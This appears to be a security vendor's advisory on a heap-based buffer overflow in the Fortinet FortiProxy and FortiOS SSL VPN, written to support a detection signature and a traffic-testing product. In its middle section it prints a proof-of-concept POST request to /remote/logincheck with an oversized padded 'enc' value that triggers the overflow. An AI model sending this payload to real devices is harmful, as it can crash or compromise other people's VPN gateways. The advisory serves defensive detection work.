Applicance Details
FortiProxy is a web gateway used to provide multiple detection techniques against internet based attacks.
FortiOS is an operating system utilised to deploy and enforce security policies, and enable centralized management across the entire distributed network.
Vulnerability
Fortinet FortiProxy and FortiOS are vulnerable to a heap-based buffer overflow, caused by improper bounds checking by the SSL VPN function.
Identification
By sending specially crafted requests, a remote attacker could overflow a buffer and execute arbitrary code on the system.
POST /remote/logincheck HTTP/1.1
PAYLOAD - ajax=1&username=test&realm=&credential=&enc=000000247255fc38aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa
Detection
By turning this into a traffic file and matching rule, we are able to detect unauthenticated attempts to overflow a buffer and execute arbitrary code on the system.
Coverage
Idappcom has created signature 8023945 along with a corresponding traffic file.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
Comments